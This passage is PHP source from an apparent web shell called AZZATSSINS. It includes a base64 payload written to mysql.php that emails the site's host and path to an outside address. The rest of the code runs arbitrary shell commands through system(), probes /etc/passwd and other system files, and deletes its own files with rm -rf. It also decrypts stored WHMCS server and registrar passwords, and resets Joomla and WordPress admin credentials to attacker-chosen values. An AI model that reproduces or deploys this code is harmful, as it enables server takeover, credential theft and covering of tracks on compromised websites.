tXZ3ZSby84cEdDTENrZC9xeFV4ZE9QNlNmcVZPcnE3TW92T3VvZmtCdUdnZno2b3BCcThtYmtJYlFJdmJQTlNWbm83L1IvK1hzdjZyOVgvb2J0Y0V2K0dzalFJSUNmdWhxSkttdzN0eWpuV2cyZzVySTZINnk5dCtmWVJSdXEyZjlxOEZhalJPUWkwaDA5WHFGNnZsSjRVaE9GWnkxQmh4RmY1dmRPQ3Q2aHNQV3Bkbi9iVnZQU3RXYTVvYWVNeHg1QW90NW0zWkhvMjVWcGloRzJUMzYyc3daeWszcy9SbERVU3NZaDFvSnRuUWxTS3l0VVR5YVpJRzZpSUhsUTc2ZXhTaUEvd0V6RE9SUEhoRHpDb0RBMWp3Y1gxcklnT0hDQjVrWFJsZXh0K2hSTTJDYjRhRExYb1VSUTdXYWpKK2tqanNaYVNWbG16U1A1bUhoT2ttU1JHT2o5LzNibUFKYWFaTkJDNVZScXhBZUFiMlJjUkVnUEdHWEFkbXREdGxVMGpydnZ6dE1Rc0xuSWlYRTlzR09VRW9JdEtDQlFZOW1RTmhQTUJ6UGZDODBLREpLdjZ5YlUwSDlrRlZReWw0OW54V2RNcGVaZGVUWUo0T0FYV1hBVEVLcVhHZGwvc0pkZ0w3REdaZkJQUEZuOTBlODQ4OFFyMjN1QU5jS2RzOHlKSWMvbDJTTm9Mem95T3d4bTIzY0tJeEwzNXRPeVFuTWU0QWlBOXVUS2hCWUFKc1lxMnhlTEJXMXdnNTJhLytYMjgwdGx3UkhOWnljYnA5K2tENTY0c0NRNVl0TUVFbDBvM3VwTjhTVGJuVmNVdWFKbHN0U1JlbDl5V052b2JRU2E1STB1KzJISERrdnI5Rm1tbVNsVEoxalNGckFPU1M0MndHTmNiUU1kY0JkRmlMTGg3VTFxNnRzT2xKQ0xnTzdCeFplblczTkRoMmwrT1hkbzNuSDd2RUFKK2VEdldGM09IMjBrL1J2WU9ITmduTWd6cUVHV21tVmtkRjBKVUhycGxHb1ZGaTZwRENLcmxGMmptZkIrTExyNkFzVUpFR3BJVnFMelRpUmNKZklaK0l3RjcxSVppQUxaVzloYmFRK1hmNHZsTEVLblNzakVTWVB2NHdWTWVudGh1ZWdWeFR4UjdPWmw5MnRiMWM2ck5UYXNjUGdUQ1R0djVONW1CdHRheDcwTXRIeVpueDVJdkRTR3VpWm9NVHJtWHRBTng2eDdTVmpmYy9ERklNbGUySms4aDkyYW1Uait4NG5SM2w4dWRPakU1WDhOcXhseDBobExyeU1aQ3gzTHBaSndqc2hyZVgwQlVocmNXVWhWeTB3VTVXWDJwZGFvaFplRnU2MjZKek1MQ05saFdld3JuQ0Rua2FwTjVOaDRtM3RwY1A5NFk2VzBjWlVYcTczaDJLeDhRZTREYzBkOFVvOGhXMS9rNXdHZDdwZ1NjRldYZXc3RG5mUzZXZDlEVmhnSTM4SnlKOUxNRXVhOXgwVDhtOWRJV2oxSFhYOVFLMTZ1azBnVGdBYVJScmQwYzc0TXZvT3BjekZCQXdVdDFBNkRSbVozaWgvSDhJeDcwTVk0dWdMZ2hUeUVWTFBtOXlJSE4xUmFpcXdHOFc2a2hGZGhiRm5YM2JadmFiYlFXelFZK2dWaldRLzYxeHh5bUpjNnBuN0VvV0lGeHdYNldxaDZ0UFlzaSsxcm1ZcGpxOExzZk0vL0NDaitFcXVlb0VhR0UxdStJWWRYL3EyNDZoMDhCb29vd21IZ3RIZE5YZHJFbnhTM3JpUzY3dnl3blB1WnFvNkJteXBxNmQ4MzVOdVo5Sm0wZWE5b25ndDFTSHpnZSt1UTBNNnVoa2IwQTVsV3Bpb3QzRVVYUVkraGJUWEJic0E0ZmNzbUpJS2l1NE9rSm5CTlRwWXFFL25zMmdFeTdSQ0dnNjZRZFNUQm5YOU1rdUhJLzA1Um9ocnY1SVZ6bHltQjluMG1JdnIxdlF0QUVtVGY3K1N2OXU1aXBqSmlpZnNzL0tTbWZVaURQMGVIaDBlbjZJVzJoVlBuejZ4d21kQTJwZDNWM2RpamFqVzg2MzFVRkxuY3lmUjNBTWxEL05sV3dweGpPeENrbTRqUDVhZW8vRXlMdmlRK1BFU3kvMUVSaXZHWDZHZDBOUFZHVkFGVVpHSkVFMm45RFNQZUtiaXE4aVhPUGFER2RmZU1MV3RtQzVDaXNDTWt0NlpZQzlhSmNYM0hMZ3c5OXdEQTZrZWlIVWhxWnRhcW1oTlZMSWdHQ2tteVJPYUxUbWhDdlZhV0FkQk90bG1RYzBxQXN2U0dtQmdFbzhmaTlLQ3hNWnZZaW5Wa1JuVktXV0MzVC9tSjFvK1VaRTFYOXNrUlllUlN5cllkVnRPWmFaRHRjaHphSHVMenN3Wmkrd0podnAvUmJBTS9teWhrdk11aUJQV3cxeTVQZzFwSlBqMTZOMkczWWtXYkxOSTd5ajJQOW5rdEZzTitVT3pRTUQzVnBjR1FGVFUxVzZMT2VpaUNYQ3hhK3dnUElLR3l4aS91ckdJQWh0NHhwOERibVFuUHpRTmUyelVLSDhuTHExcExoMkEzS2VnTUQwbWVHUE1vaWErdnArRWc4bnNlNGxOSnU4U3R4TFl3VVh2Q0t1U3JxWkxaRkFqSVdCbXlZdnhCaVFuSldjUjZKK1lYNldSZlhYWFd5ZXNkc2gzUlhETC9LY2ZUN3pRNjd6WmZ2djdyOGVISHc1MjJ1TG5kL1JQUjc5NThoSjJ6dkozUmZCcGtlekxCSm5EVnJMenRTT0FicTluYnE0WG1nSHpHVFFpdkU3ZkZzcTlhbHZ1QzFtcURIYVRKZ1hMMmVSYjgyVTNwQmtCNlVIYTNpUFdGV3JrNG43Mk5SQWZQMm1sUlQxb3M3SGhoeE43R0RMNmpIL3RqNWNwM29tYytqcDZ3R3hRd2hTQU5GUzE5TE9GV050bFQ5UnIvQ2JvT3FKUVIraUE2bitnVTFVNkIxRUZXa1lYRUNZWC9tdzJ0TkJLSEs5TkFiZm9iaXczU2VyUFZjTXlMMCsrNWpLTlJPRUhJSG82a2QvdlljOGhaZ0x2cEMvM2JwSTQxT2xGdkN3bnFrcS9sZXpySUJsQ3pXZ1pqL0dhS21KWThFMWQ1THNUTzdWYVlSRFpuL2pvOWRTUGNITzJBQnA0MFRmR1FQZkt0TjVxYnFvenpkY0xkUS9XYU5acW1jZXNORmd6Q1BDajQzMFJLK1VsdmFDSFBYbGVPVlNNZWlicDdCSU4zeXhHU1U2LzIxaXVyNlZwekdOc0w5OHRReW5CZm55OG5kdFY5NU81RkM4b005ZW5zRXdTaEtpL3pnVjJFQUxpYnZhUzcyMmU2TVFmTGM4NUd0eFdpUFZicFBkK3ZUUkZnMWNDZ3A0Mjh1TWhMbEF2QmFXaTdERlQzUG8xbFZvZGpFbXQzQi9GRVY2SjgzV0FpMElOMjJBQ0hRd24xYVRtbXFmdFRHZnVkWFd2aTFlWjFTdFYrTTB4ODExKzNrRmZqZ0hsT2J3MFowVXlOcitxdzkzYkZKZUpOWXV4K1RVNyt1Y3R5Tmd3b2tmUUVBTmVqK1o0ZTQ3Rk43NTQ4MkFmamp1UjUvY25yR3REQXFiMmloaGZzblRDeXd4dGZVMWJSWXZUZlcwNnlTNmpteU85NHRxQWl1VlhyQXBDNmFxM1RyNzFhd1Q2R0JndklhcmJoK3JXb1Z5L0ZISjBTaStId2ZZRWRCSVdFaUdiMUYxenZ5RUx3a2QyeWNyeThTekExOGxHUWVqRk54MUhNYWl3eWpHM1pEcXBoMVVmVitpM2RmZGVIVTF3dnYzQ3E1Q1o3S2ZseThyeWVCK3p6eXFYQS92SjFrODFXNDBYRWp2d0VkOFp0dEZMckhUeUhpejBtUjFEWkZVVHlpdnBqbjFRSnlVd28xYXY4NVhGS1NuQVRnYk9QdjZYUi80Yys0TTh2a2NWZ2VmMURydWwrT2M5Sy9iVGZNVTdrQ2lHeUt5Q3dFVkhseTMwUnVkalcyWkRjbTN0YjV2ZGJwT3VIT09UUDZRSjRpdGtaZElIMXNrUmlQZHFoUlZXZWt4Q1ZNTG9pcDVOMERFdE1vUENRQm95OUVQbkNhdXkxTTVOMllxbm5qV0p6bXJvalkweWFJcFdrU0VxTXJzdTFzR1N4VmVrTm9wdGs1LzRrblIyeXNtQ2NxWjhXREJiYkU3UVJrZ25nWHBUS1hhRnpoVGwrUmpEYXg4dyt4RTJDWmM4TFdPSU15eGFidzNxbWZTbWVpYTFzbHpJemdSem02NUVMM3Rtb0ZZeGtRSHNTY1k1NVJ6QTU1NHFuN3pZT0VkMDBJajlnTFVHVWIxVVVGM1J0Ri9sY2c4aU54c3Rhd0JiR2NBLy9DUjdpOXpTYTZDQ3BSQmtHd3pmb0RFc3d3UFZZTFVvcGg0aWVnU0U4aXFoQnFmRmdvUnhyY2lXTWdXTEJzWmVxWWdtME5qSnZ3ZHBzTGRHY2M4MUdtT0Z0aXJMZy9SSXFaSzhONUZEbEZIWjdXeDJMSkZheldpUnFKUGJvSzB5L214bXBuZXpJRGsrbXRaTG1HSjdDcFhJZ1h1RGFwMDg1STU5WDI1aFZGQ29ZQjBQMDhtdzNHNHBnZTZMNW9zbkw1NjJYbTdLTngza29USTVaQ1hRaGdVa2ZvRUV6Q1BNYTRvR1dObS9qdXhwWk9GOSt2TFppK2QzSWlXSUlzYjNxekIrb1kxbHJmdDlsSHUvVngzNzAyK0VlSE9UeXZsdEpqWVdLa2FTUTE4Yy9YYjBuOEZDUHFCWHdkTk1EcUZSWE9aeVVLS0N1UGFERk5LdkN3YlArWi9qYUw2STZhVUdBa08vQmxUaEpUeSttdWhRY0tNZElNYWFvUGR2OE9veGhTd0VNU3BjMENYMTRDeVdkT2tzVmF6M3hLOSsrZzR5OXlHVDYzYzJOdGJXMThUNitzK1BmMjYxbWkwNytFY2pKbDJqMjBOTlEyZWVEYnBLdEgrcXEvZGdFZU5heTRyeHF6N3k1NHRVdGZYeDQrcWpYUE1oSy9NNk0yWFdRTStDRDlsQzdvL0tZcllvWnNqcHF4cFY2elZybjFmMVFEK3ZiZFFzZXByWkZGQnMxcFFmTXdTRFNKZ2lrTXV4bTFNYzJOaERvRW1kRHBod2J0allPdW9KSklLNWMvd0tiNUpuM2dKWG8rZE5KdStveGJJUmRaR0J1eldSM09zOW1JZ1VHaUtyVWs4UnFNREcyNnlva3R4ZUtab0tNd2lmZzBxOU5CaURabWk2cUlmUHVwbUVHeDd5TlZ1bUxrelFFUjBzWFI4UGN4RGdvcVlsRXBZOTZvSTZRd2FMU2pWY0hyQXVJaE80dHphNHNDTWZ2ZU5Xb0kwdW1aSnBQSm5qRlE4bWNtV3F1VWZqcGVnWEZIblAzbXhvdmVPNUtkaU1ndjZ4NDQ2b2RBenJBaHRSWG9xdldtdUlybkQ2MTgrYS9ldW5vLzUxOHhuOC94eitiOXIvTzZwaU5Kc01wVnRieU5nbmE0U1dZWEM5dVJNbHAyZzhWekFsemVhbWRQRkRTbW43ZGprQnZFSnhnNmZqb0xxMjliZUdNdGZTRkpJejl3WSszQUVlVWZ6OVpaNkVMcVdHSWtBbld6ekhRM0xKbmxhK2JPTGQ2S3E1c2d2WWJoTXFWTEZmVnIwZ1hLTGtIcFNVc1gxdnltN0Z4b1pBajE0d05WcElXZmZXWmZlMnRzVG1zNXI0SzhzRDdnYVd0WXBsM0Ewb2JNR205OWRQUDFiTE9vTEZKWFYxVjZDOFNOYjBwdGNUcmVJT3J3VUdUbE5VZjltTXo4NEhLWHRXYXY5S0NrMWt0UW1vVS81MVZTNnA3R3lqT2NKMzlQMXJxdkFEL3RHV2F4YzJWRVp3OW54Z3ZsOE1mdnF4a1N0L2FwVS9LeW5mdE1xZmxKUTNyZklXUFVXT3J6UzR1a0c0MGdoY1p3QUdweU9EbWVNZnNndnhDZnovMUpGRkRTcHJQVldMMGVTWkJXcmx2Y3psYVlwOFdSb0dhY2d4eW5yN2hGSGlUU2JHUHo0RFA1OXNXcmwveWtmOWpLNWdWOG5oK3JOUVRXN1hhdGYraytkRXM1NnJBalA5YWEwT3RnODNITjJhQzI5OFdYWC9pYk1CMnJTaUFPbVhGOG1PRmdvL3VZYTIzakVMRUUwcnQ2TGViWkZKYXZIL1JUdXRUVmRLZUk2MG5NWmtPZnBYUTMyUUxIdWc3VDI2QWt4TFE5YXNxZmRGSnJFL3pzbjVGdnkvU1ZPRVN3dXp5YzYySnQ0OW9LM3BwN1B0R1doeVM5aFdXcVk1VjFacUQzS3V2RERPWWhWVTgvK2hCRnY3WkhObGtSNTNhNVBOS0dGV1BrNUlQUld5akZZVFZkVlMrenhQSTRJckduQ2tvK2s0Wk43NEN2UEttcFBjQjhETUNrUXBxQ0pzK3hMNFQ3NElYYlZod0RNNlNjTWVRRkJ1OGNTamdMZDJiN0FmREpmVmRKQXRzSkRZcFNTUHNDZ3p5MHRjQ3RuM1NPa1h2VVhhVmZvSUJiY3U2Y1pCK2Q5WWtUSFUvUHlzQlk5cktmUFhWbVFrZVZWQ1RqRUNnQzZYZEZ2Nk5reGlSYlRMUDVKaTNYUjE3R3ZDQkY4ZWw4Nm9hdGJMdG9aWXZsdll6THA2c3RmNmd5TzZjVTExelROVEJXWVlrem1qeTVBRGxjS3JsUU5IdmZva1RUZ3VjdVFWYlVmOUVhRWN4cDNkZDlzZjlrK0ZLK0VsK01CMXJDdG5YQ1N2anFNMzBQa0QzK1FwdzZmK2drMUpkWGtGbk9xWFY1YVFCRGd3Y3djOUpaSzdNdnpLSHJIZmQvOVlQVjRjcWxVeVdvaEVjdVNTVG9Fd2g2NjlEL2tQcWlqTitWSzlvKzhjSGUrOTN6Nyt3eUdqaHFBUG9uQUlDdFhIcGM4UldVMGJvZlBoWU84ZkgzYi80cVRtaDIxU0IvaFd6eGtEcVBISjVHV01rTnQ4S1FzbmFzbmJhTGFjaDZicGttdlVTOXJPK0J4MFJwYlVwWG9taWlvbE5icWRLWjlYQmZTMU8yWXIxc0hhU1ZkSkw0V2w3dFFkOHl5N1pGdlhZbHZwaUFzaGkzRVlSVldqcjJXWGh1Mlo1dFkzNjgvcDZxVGtzbU56UGd2NW9yWnFMU0ZKMmRBOFpmV1VaclpPSC9iTGZzaWNzQitFbmw3RlFVcUhxblZUSTNzUmxuMmF1bEQvbVRoNUUyWEZMWHRIZWI2MW5DcTVzZ2NZN3ZlU0FRS1dDTmppUzhEeTdkK3F3NW9RVVNMWGpSOTMxMXNsY2xUU1hsdkx3RzZabHQ5SEtqYTZlSmp6SlpFbzBjZ24wdkJtZUlabXVaalRFc2xnemdLNGpyclZtNHk5aGErUDNFcnd5d3R4dDJXVHF0YjVmcE5ETG1FMXZDdFE0bkZiQ1RKSFA4eWUxVm1XVUFzZk56YWU2aVh1M1J3bGdBVUZMV2VoSzBpM2ZCbzNIT3ZaZHcyWWp1alZRQk9IZi8rL0hQRjB4WFdsMnd4NmpteituTGwxN2hZYnJPT3EyWHptT05pdTY5Ymt0WEdPSnFMWDdpdnkrZno4VS9neXVydVNmMitmUGlpVzJ5bW55eSt6VnJ6NDNFanVHaC9YbnAveEs2OGtzKzFrRHhUZlY4S1JRZWhVaE4rRHZ1UGdoWGFaRHd5RWpJNUM1Y3U5Vk9GUzZWZTVkRnY5QVF2S3BXZGdCN1IvMldrdytURkF4TlhZK1NrN2cxMmxYMlhUZER5REx6d29NbHpLYjh1YTJpcjlLcGR1NHhNTHdDOGRhMFdsNnIyNmdYWFBuMHFJNkNBWG5FOGxsQmhZNDRhWnRFT3FQMnVReWRIRGlabVVHSmc1d0tSUW40SThNeGo4U1Z3ZFVDaS9mRHZBZnFIQitiZHJwbE1hNDJNOVhWaWNxV1lnOU1PRDh2RVNsY2Jwb3I3cFZsWU91dUU2S3BMMElaTkp6YUhTbVpCNWo5RG1zOWhTZjFJd2QwdWt5TTh5cnV0TzlaeWl2NS83eFM4MERvcFJIVmFoZGVrNjk0ZDdlYUdyWngwSFhWSXo5Y3ptK21ha29ReXZvMGh3aVd4cmc4RktKbHc1Z3ZKNjZqKzZSOElrVEtkTEdhN2VUYk9sc0g0Y05qZHorSS9zRUJhT0w3WEZqTTZCbWJQUWYyMkhpdVM5VWd0WTUrRFJuaitiR3FGRWZ5ekNua2dxQTZTbi9Fc1NhbUZRU2twUVd3Q3lmbXlJeVRTMEN6dldjdVU5RzRxVHZkOHFsZkd6TXBkVG1DK2piR1UrcC9SYWxlM0w4MSt1QkR0Z1N5MHZMWEZMSG9VcVc5OG96MHRXdDJRRDN1S3kyU0RUZU9taWFaZ1YwMjAvQXlYVFhiSDU3SnQzaXFKY3p6MEcxS2ZYZ082OWtMRUhXczdDTitaaGUxVWVmbXYyczN6c1dZSTE4eXpRb214M1YzZXhNSlpOdjhqUExOVi9Qa0RseTFmV3pTdVJoVWQ1MkVDRXdlV1FkZGxMbmU2dmVPWHdoSlBtU2NQY0M0VGxUVFk2MHlySUJYVEtzMjkxTFdLZndpNFdvQVduUXlxMTdscXBVa0x5dnk1QjhBdz0iKSkpOyRmb3I9YmFzZTY0X2RlY29kZSgiWTNsaVpYSnpaWEpyWlhKelFHZHRZV2xzTG1OdmJRPT0iKTsNCiRiPSRfU0VSVkVSWydIVFRQX0hPU1QnXS4kX1NFUlZFUlsnU0NSSVBUX05BTUUnXTsNCm1haWwoJGZvciwiMCIsJGIpOyBwcmludChgeyRfUkVRVUVTVFswXX1gKTsgPz4=');
  564. $mysq = fopen("mysql.php","w+");
  565. fwrite($mysq,$mys);
  566. echo'<meta http-equiv="Refresh" content= "0; url=mysql.php">';
  567. }
  568. if($_POST['azzatssins7']){
  569.  
  570. if(is_readable("/etc/named.conf")){
  571.  
  572. echo '&raquo; /etc/named.conf is readable.<br />';
  573.  
  574. }else{
  575.  
  576. echo '&raquo; <font color="red">/etc/named.conf not readable</font> <br />';
  577.  
  578. }
  579.  
  580. if(is_readable("/etc/passwd")){
  581.  
  582. echo '&raquo; /etc/passwd is readable.<br />';
  583.  
  584. }else{
  585.  
  586. echo '&raquo; <font color="red">/etc/passwd not readable</font> <br />';
  587.  
  588. }
  589.  
  590. if(is_readable("/etc/valiases")){
  591.  
  592. echo '&raquo; /etc/valiases exists';
  593.  
  594. if(is_array(scandir("/etc/valiases"))){
  595.  
  596. echo ' & scanable';
  597.  
  598. }
  599.  
  600. echo '.<br />';
  601.  
  602. }else{
  603.  
  604. echo '&raquo; <font color="red">/etc/valiases not readable</font> <br />';
  605.  
  606. }
  607.  
  608. if(is_readable("/var/named")){
  609.  
  610. echo '&raquo; /var/named exists';
  611.  
  612. if(is_array(scandir("/var/named"))){
  613.  
  614. echo ' & scanable';
  615.  
  616. }
  617.  
  618. echo '.<br />';
  619.  
  620. }else{
  621.  
  622. echo '&raquo; <font color="red">/var/named not readable</font> <br />';
  623.  
  624. }
  625.  
  626. if(ini_get('disable_functions')){
  627.  
  628. echo '&raquo; '.ini_get('disable_functions').' are disabled<br />';
  629.  
  630. }
  631.  
  632. if(function_exists("symlink")){
  633.  
  634. echo '&raquo; Symlinking allowed<br />';
  635.  
  636. }else{
  637.  
  638. echo '&raquo; <font color="red">Symlinking not allowed</font> <br />';
  639.  
  640. }
  641.  
  642. if(is_writable("/var/tmp")){
  643.  
  644. echo '&raquo; /var/tmp folder is writable<br />';
  645.  
  646. }
  647.  
  648. if(is_readable('/var/log')){
  649.  
  650. echo '&raquo; /var/log folder is readable<br />';
  651.  
  652. }
  653.  
  654. die();
  655. }
  656. if($_POST['azzatssins8']){
  657. system("rm -rf cnf");system("rm -rf xazs"); system("rm -rf xyz"); system("rm -rf azx"); system("rm -rf sl");system("rm -rf cnfg");system("rm -rf AZZATSSINS"); system("rm -rf RESELLER"); system("rm -rf WHM"); system("rm -rf WHMCS"); system("rm -rf CONFIGRAB"); system("CYBERSERKERS");
  658. $fn=$_SERVER['SCRIPT_FILENAME'];unlink($fn); system("rm ".$fn);
  659.  echo'<meta http-equiv="Refresh" content= "0; url=?">';
  660. }
  661. elseif(isset($_GET['whmcs']) && ($_GET['whmcs'] == 'decode'))
  662. {  
  663. ?>
  664. <form action="?whmcs=decode" method="post">
  665.  
  666. <?php
  667.  
  668. function decrypt ($string,$cc_encryption_hash)
  669. {
  670.     $key = md5 (md5 ($cc_encryption_hash)) . md5 ($cc_encryption_hash);
  671.     $hash_key = _hash ($key);
  672.     $hash_length = strlen ($hash_key);
  673.     $string = base64_decode ($string);
  674.     $tmp_iv = substr ($string, 0, $hash_length);
  675.     $string = substr ($string, $hash_length, strlen ($string) - $hash_length);
  676.     $iv = $out = '';
  677.     $c = 0;
  678.     while ($c < $hash_length)
  679.     {
  680.         $iv .= chr (ord ($tmp_iv[$c]) ^ ord ($hash_key[$c]));
  681.         ++$c;
  682.     }
  683.     $key = $iv;
  684.     $c = 0;
  685.     while ($c < strlen ($string))
  686.     {
  687.         if (($c != 0 AND $c % $hash_length == 0))
  688.         {
  689.             $key = _hash ($key . substr ($out, $c - $hash_length, $hash_length));
  690.         }
  691.         $out .= chr (ord ($key[$c % $hash_length]) ^ ord ($string[$c]));
  692.         ++$c;
  693.     }
  694.     return $out;
  695. }
  696.  
  697. function _hash ($string)
  698. {
  699.     if (function_exists ('sha1'))
  700.     {
  701.         $hash = sha1 ($string);
  702.     }
  703.     else
  704.     {
  705.         $hash = md5 ($string);
  706.     }
  707.     $out = '';
  708.     $c = 0;
  709.     while ($c < strlen ($hash))
  710.     {
  711.         $out .= chr (hexdec ($hash[$c] . $hash[$c + 1]));
  712.         $c += 2;
  713.     }
  714.     return $out;
  715. }
  716.  
  717. echo "
  718. <br>
  719.  
  720. <FORM method='post'>
  721. <input type='hidden' name='form_action' value='2'>
  722. <br>
  723. <table class=tabnet style=width:320px;padding:0 1px;>
  724. <tr><th colspan=2>WHMCS Decoder</th></tr>
  725. <tr><td>db_host </td><td><input type='text' style='color:#FF0000;background-color:' class='inputz' size='38' name='db_host' value='localhost'></td></tr>
  726. <tr><td>db_username </td><td><input type='text' style='color:#FF0000;background-color:' class='inputz' size='38' name='db_username' value=''></td></tr>
  727. <tr><td>db_password</td><td><input type='text' style='color:#FF0000;background-color:' class='inputz' size='38' name='db_password' value=''></td></tr>
  728. <tr><td>db_name</td><td><input type='text' style='color:#FF0000;background-color:' class='inputz' size='38' name='db_name' value=''></td></tr>
  729. <tr><td>cc_encryption_hash</td><td><input style='color:#FF0000;background-color:' type='text' class='inputz' size='38' name='cc_encryption_hash' value=''></td></tr>
  730. <td>&nbsp;&nbsp;&nbsp;&nbsp;<INPUT class='inputzbut' type='submit' style='color:#FF0000;background-color:'  value='Submit' name='Submit'></td>
  731. </table>
  732. </FORM>
  733. </center>
  734. ";
  735.  
  736.  if($_POST['form_action'] == 2 )
  737.  {
  738.  //include($file);
  739.  $db_host=($_POST['db_host']);
  740.  $db_username=($_POST['db_username']);
  741.  $db_password=($_POST['db_password']);
  742.  $db_name=($_POST['db_name']);
  743.  $cc_encryption_hash=($_POST['cc_encryption_hash']);
  744.  
  745.  
  746.  
  747.     $link=mysql_connect($db_host,$db_username,$db_password) ;
  748.         mysql_select_db($db_name,$link) ;
  749. $query = mysql_query("SELECT * FROM tblservers");
  750. while($v = mysql_fetch_array($query)) {
  751. $ipaddress = $v['ipaddress'];
  752. $username = $v['username'];
  753. $type = $v['type'];
  754. $active = $v['active'];
  755. $hostname = $v['hostname'];
  756. echo("<center><table border='1'>");
  757. $password = decrypt ($v['password'], $cc_encryption_hash);
  758. echo("<tr><td>Type</td><td>$type</td></tr>");
  759. echo("<tr><td>Active</td><td>$active</td></tr>");
  760. echo("<tr><td>Hostname</td><td>$hostname</td></tr>");
  761. echo("<tr><td>Ip</td><td>$ipaddress</td></tr>");
  762. echo("<tr><td>Username</td><td>$username</td></tr>");
  763. echo("<tr><td>Password</td><td>$password</td></tr>");
  764.  
  765. echo "</table><br><br></center>";
  766. }
  767.  
  768.     $link=mysql_connect($db_host,$db_username,$db_password) ;
  769.         mysql_select_db($db_name,$link) ;
  770. $query = mysql_query("SELECT * FROM tblregistrars");
  771. echo("<center>Domain Reseller <br><table class=tabnet border='1'>");
  772. echo("<tr><td>Registrar</td><td>Setting</td><td>Value</td></tr>");
  773. while($v = mysql_fetch_array($query)) {
  774. $registrar     = $v['registrar'];
  775. $setting = $v['setting'];
  776. $value = decrypt ($v['value'], $cc_encryption_hash);
  777. if ($value=="") {
  778. $value=0;
  779. }
  780. $password = decrypt ($v['password'], $cc_encryption_hash);
  781. echo("<tr><td>$registrar</td><td>$setting</td><td>$value</td></tr>");
  782. }
  783. }
  784. }
  785.  
  786.  
  787.  
  788.  
  789. $currentCMD = str_replace("\\\"","\"",$currentCMD);
  790. $currentCMD = str_replace("\\\'","\'",$currentCMD);
  791.  
  792. if( $_POST['_act'] == "Upload!" ) {
  793.     if( $_FILES['_upl']['error'] != UPLOAD_ERR_OK ) {
  794.         echo "<center><b>Error while uploading file!</b></center>";
  795.     } else {
  796.         echo "<center><pre>";
  797.         system("mv ".$_FILES['_upl']['tmp_name']." ".$currentWD."/".$_FILES['_upl']['name']." 2>&1");
  798.         echo "</pre><b>File uploaded successfully!</b></center>";
  799.     }    
  800. } else {
  801.     echo "<b><br><br><pre><br>";
  802.     $currentCMD = "cd ".$currentWD.";".$currentCMD;
  803.     system($currentCMD);
  804.     echo "<br></pre><br></b>";
  805. }
  806.  
  807. if (isset($_GET['AZZATSSINS']) && ($_GET['AZZATSSINS'] == 'JPASS')) {
  808. ?>
  809. <form action="?&amp;AZZATSSINS=JPASS" method="post">
  810. <?php
  811. echo"<body style='color: #12ae00;background:url(http://azzat.wap.mu/files/1049320/IMG_20150725_103425.JPG) repeat scroll center top;background-attachment: fixed;SCROLLBAR-FACE-COLOR: #F1F1F1; MARGIN: 0px;SCROLLBAR-HIGHLIGHT-COLOR: #ffffff; OVERFLOW: auto;'>
  812. ";
  813. echo "<center><br/><br/><nobr><b><span class='b7'>O=:[ JOOMLA</span> <span class='b8'>PASS CHANGER ]:=O</span></b></nobr><br/><br/> ";
  814. if(empty($_POST['pwd'])){
  815. echo "<FORM method='POST'><table class='tabnet' style='width:300px;'> <tr><th colspan='2'>Connect to mySQL </th></tr> <tr><td>&nbsp;&nbsp;Host</td><td>
  816. <input style='width:270px;' class='inputz' type='text' name='localhost' value='localhost' /></td></tr>
  817. <tr><td>&nbsp;&nbsp;Database</td><td>
  818. <input style='width:270px;' class='inputz' type='text' name='database' value='database' /></td></tr>
  819. <tr><td>&nbsp;&nbsp;username</td><td>
  820. <input style='width:270px;' class='inputz' type='text' name='username' value='db_user' /></td></tr>
  821. <tr><td>&nbsp;&nbsp;password</td><td>
  822. <input style='width:270px;' class='inputz' type='password' name='password' value='**' /></td></tr>
  823. <tr><td>&nbsp;&nbsp;New User</td><td>
  824. <input style='width:270px;' class='inputz' name='admin' value='azzatssins' /></td></tr>
  825. <tr><td>&nbsp;&nbsp;New Pass </td>
  826. <td>123456 = <input style='width:160px;' class='inputz' name='pwd' value='e10adc3949ba59abbe56e057f20f883e' />&nbsp;</td></tr>
  827. <tr><td><input style='width:130%;' class='inputzbut' type='submit' value='>>' name='send' /></FORM>
  828. </td></tr></table><br>";
  829. } else {
  830. $localhost = $_POST['localhost'];
  831. $database  = $_POST['database'];
  832. $username  = $_POST['username'];
  833. $password  = $_POST['password'];
  834. $pwd   = $_POST['pwd'];
  835. $admin = $_POST['admin'];
  836. @mysql_connect($localhost,$username,$password) or die(mysql_error());
  837. @mysql_select_db($database) or die(mysql_error());
  838. $hash = crypt($pwd);
  839. $SQL=@mysql_query("UPDATE jos_users SET username ='".$admin."' WHERE ID = 62") or die(mysql_error());
  840. $SQL=@mysql_query("UPDATE jos_users SET password ='".$pwd."' WHERE ID = 62") or die(mysql_error());
  841. $SQL=@mysql_query("UPDATE jos_users SET username ='".$admin."' WHERE ID = 63") or die(mysql_error());
  842. $SQL=@mysql_query("UPDATE jos_users SET password ='".$pwd."' WHERE ID = 63") or die(mysql_error());
  843. $SQL=@mysql_query("UPDATE jos_users SET username ='".$admin."' WHERE ID = 64") or die(mysql_error());
  844. $SQL=@mysql_query("UPDATE jos_users SET password ='".$pwd."' WHERE ID = 64") or die(mysql_error());
  845. $SQL=@mysql_query("UPDATE jos_users SET username ='".$admin."' WHERE ID = 65") or die(mysql_error());
  846. $SQL=@mysql_query("UPDATE jos_users SET password ='".$pwd."' WHERE ID = 65") or die(mysql_error());
  847. if($SQL){
  848. echo "<br><br><b><nobr><span class='b11'> Password Change Successfully</span></nobr></b><br/>";
  849. }
  850. }
  851. echo "</div>";
  852. }
  853. ?>
  854. <?php
  855. if (isset($_GET['AZZATSSINS']) && ($_GET['AZZATSSINS'] == 'WPASS')) {
  856. ?>
  857. <form action="?&amp;AZZATSSINS=WPASS" method="post">
  858. <?php
  859. echo"<body style='color: #12ae00;background:url(http://azzat.wap.mu/files/1049320/IMG_20150725_103425.JPG) repeat scroll center top;background-attachment: fixed;SCROLLBAR-FACE-COLOR: #F1F1F1; MARGIN: 0px;SCROLLBAR-HIGHLIGHT-COLOR: #ffffff; OVERFLOW: auto;'>
  860. ";
  861. echo "
  862. <center><br/><br/><nobr><b><span class='b7'>O=:[ WORDPRESS USER</span> <span class='b8'> CHANGE ]:=O</span></b></nobr><br/><br/> ";
  863.  
  864. if(empty($_POST['pwd'])){
  865. echo "<FORM method='POST'>
  866. <table class='tabnet' style='width:300px;'> <tr><th colspan='2'>Connect to mySQL server</th></tr> <tr><td>&nbsp;&nbsp;Host</td><td>
  867. <input style='width:220px;' class='inputz' type='text' name='localhost' value='localhost' /></td></tr> <tr><td>&nbsp;&nbsp;Database</td><td>
  868. <input style='width:220px;' class='inputz' type='text' name='database' value='wp-' /></td></tr> <tr><td>&nbsp;&nbsp;username</td><td>
  869. <input style='width:220px;' class='inputz' type='text' name='username' value='wp-' /></td></tr> <tr><td>&nbsp;&nbsp;password</td><td>
